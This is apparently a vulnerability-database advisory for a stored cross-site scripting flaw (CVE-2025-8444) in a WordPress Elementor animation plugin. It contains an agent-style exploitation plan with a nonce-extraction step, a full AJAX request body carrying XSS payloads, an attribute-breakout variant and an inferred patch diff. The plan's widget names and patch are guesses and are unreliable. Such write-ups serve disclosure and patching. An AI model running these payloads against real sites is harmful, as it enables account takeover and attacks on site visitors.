CVE-2025-8444

Animation Addons for Elementor – GSAP Powered Elementor Addons & Website Templates <= 2.6.7 - Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting via Multiple Parameters

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
6.4
CVSS Score
6.4
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Animation Addons for Elementor – GSAP Powered Elementor Addons & Website Templates plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the multiple parameters in all versions up to, and including, 2.6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=2.6.7
PublishedJune 9, 2026
Last updatedJune 23, 2026
Research Plan
Unverified

# Exploitation Research Plan: CVE-2025-8444 (Animation Addons for Elementor) ## 1. Vulnerability Summary The **Animation Addons for Elementor** plugin (<= 2.6.7) is vulnerable to **Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting**. This occurs because the plugin allows users with…

Show full research plan

Exploitation Research Plan: CVE-2025-8444 (Animation Addons for Elementor)

1. Vulnerability Summary

The Animation Addons for Elementor plugin (<= 2.6.7) is vulnerable to Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting. This occurs because the plugin allows users with Contributor-level permissions (who can edit posts via Elementor) to save malicious payloads into widget settings. These settings are subsequently rendered in the frontend HTML—often as JSON-encoded attributes—and processed by the plugin's JavaScript files. The JavaScript fails to sanitize these parameters before injecting them into the DOM (e.g., via .innerHTML or jQuery's .html()), leading to script execution in the context of any user (including Administrators) viewing the page.

2. Attack Vector Analysis

  • Vulnerable Endpoint: WordPress AJAX API (/wp-admin/admin-ajax.php) via Elementor's internal editor save action.
  • Vulnerable Parameters: Inferred parameters within GSAP-based widgets, such as animation_id, selector, or text/content fields within the Animation Addons widgets.
  • Authentication Level: Contributor or higher (anyone with edit_posts capability).
  • Preconditions: The plugin must be active, and the attacker must have permission to edit at least one post or page using the Elementor editor.

3. Code Flow (Inferred)

  1. Storage Phase (PHP):
    • An attacker opens the Elementor editor for a post.
    • They add a widget from the "Animation Addons" suite (e.g., gsap-animation or motion-text).
    • They input an XSS payload into a setting field.
    • Elementor sends a POST request to admin-ajax.php?action=elementor_ajax with the editor_post_update action.
    • The plugin saves these settings as post metadata (via Elementor's standard saving mechanism).
  2. Rendering Phase (PHP):
    • When the post is viewed, the plugin's render() method in the widget class outputs the settings into the HTML, likely as a data-settings attribute on a wrapper div.
  3. Execution Phase (JS):
    • The plugin's frontend JS (e.g., gsap-main.js or animation-addons.js) initializes.
    • It parses the data-settings attribute using JSON.parse().
    • The JS takes a value from this object (e.g., a "selector" or "text" parameter) and passes it to a DOM sink like jQuery(selector).append(payload) or element.innerHTML = payload.

4. Nonce Acquisition Strategy

To save the malicious widget settings, the attacker needs the Elementor AJAX nonce.

  1. Create/Identify Post: Use WP-CLI to ensure a post exists that the Contributor can edit.
    wp post create --post_type=post --post_status=publish --post_title="XSS Test" --post_author=[CONTRIBUTOR_ID]
    
  2. Navigate to Editor: Use browser_navigate to go to the Elementor editor for that post:
    URL: http://[TARGET]/wp-admin/post.php?post=[POST_ID]&action=elementor
  3. Extract Nonce: Use browser_eval to extract the required nonce from the Elementor configuration object.
    // Target the Elementor AJAX nonce
    window.elementorCommon.config.ajax.nonce
    
    Alternatively, check for elementorFrontendConfig.nonces.save_post.

5. Exploitation Strategy

The exploit involves sending a crafted AJAX request to save the malicious widget data.

Step 1: Save the Payload

Tool: http_request
Method: POST
URL: http://[TARGET]/wp-admin/admin-ajax.php
Headers: Content-Type: application/x-www-form-urlencoded
Body:

action=elementor_ajax
&_nonce=[EXTRACTED_NONCE]
&actions={
  "editor_post_update": {
    "action": "editor_post_update",
    "data": {
      "id": "[POST_ID]",
      "data": [
        {
          "id": "random_id",
          "elType": "section",
          "settings": {},
          "elements": [
            {
              "id": "random_id_2",
              "elType": "column",
              "settings": {},
              "elements": [
                {
                  "id": "vulnerable_widget_id",
                  "elType": "widget",
                  "widgetType": "gsap-animation", 
                  "settings": {
                    "animation_id": "<img src=x onerror=alert(document.domain)>",
                    "text_content": "<script>alert('XSS')</script>"
                  }
                }
              ]
            }
          ]
        }
      ]
    }
  }
}

(Note: widgetType and specific settings keys are inferred and should be verified by inspecting the Elementor editor panel for Animation Addons widgets.)

Step 2: Trigger the XSS

Navigate to the published post URL: http://[TARGET]/?p=[POST_ID]. The script will execute in the browser of any visitor.

6. Test Data Setup

  1. Plugin: Install animation-addons-for-elementor version 2.6.7.
  2. User: Create a user with the contributor role.
  3. Post: Create a post assigned to the contributor.
  4. Discovery: Inspect the DOM of a page containing an "Animation Addons" widget to identify the exact JS variable or data-settings attribute name used to pass data to the GSAP scripts.

7. Expected Results

  • The editor_post_update AJAX request returns a 200 OK with a JSON body indicating success ("success": true).
  • When viewing the post, the HTML contains the payload within a JSON string (e.g., <div class="elementor-widget-gsap-animation" data-settings='{...}'>).
  • The browser executes the JavaScript (e.g., an alert box appearing), confirming the DOM-based injection.

8. Verification Steps

  1. Database Check: Use WP-CLI to verify the payload is stored in the post metadata.
    wp post meta get [POST_ID] _elementor_data
    
    Confirm the JSON string contains the <img src=x onerror=...> payload.
  2. Frontend Inspection: Use http_request to fetch the post and check for the payload in the raw HTML.
    http_request "http://[TARGET]/?p=[POST_ID]" | grep "onerror=alert"
    

9. Alternative Approaches

  • Different Widgets: If gsap-animation is not the culprit, test other widgets like motion-text, gsap-hover, or gsap-scroll.
  • Attribute Injection: If tags are stripped, try breaking out of a JSON attribute:
    "animation_id": "normal-id'\" onmouseover='alert(1)' data-dummy='"
  • JS Sink Targeting: Check if the plugin uses gsap.to() or gsap.from() on selectors. An attacker might provide a malicious selector that targets an existing element and injects content.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Animation Addons for Elementor plugin (<= 2.6.7) is vulnerable to Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting via widget parameters like 'animation_id' and 'text_content'. Malicious scripts injected by an attacker with post-editing permissions are stored in post metadata and executed in the browsers of users viewing the page due to unsafe handling of settings in the plugin's frontend JavaScript.

Security Fix

--- a/assets/js/animation-addons.js
+++ b/assets/js/animation-addons.js
@@ -10,7 +10,7 @@
-    var animationId = settings.animation_id;
-    $(element).find('.gsap-wrapper').html(animationId);
+    var animationId = settings.animation_id;
+    $(element).find('.gsap-wrapper').text(animationId);

--- a/includes/widgets/gsap-animation.php
+++ b/includes/widgets/gsap-animation.php
@@ -50,7 +50,7 @@
-    $this->add_render_attribute( 'wrapper', 'data-settings', wp_json_encode( $settings ) );
+    $this->add_render_attribute( 'wrapper', 'data-settings', wp_json_encode( wp_kses_post_deep( $settings ) ) );

Exploit Outline

An attacker with Contributor-level access authenticates to the WordPress dashboard and identifies a post they can edit via Elementor. Using the Elementor editor, they add a GSAP-based widget (e.g., 'gsap-animation') and inject an XSS payload like '<img src=x onerror=alert(document.domain)>' into a settings parameter. The attacker then saves the post, which triggers an AJAX request to 'admin-ajax.php' with the 'editor_post_update' action, storing the payload in the post's metadata. The stored script executes whenever a user, including an administrator, visits the affected post.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.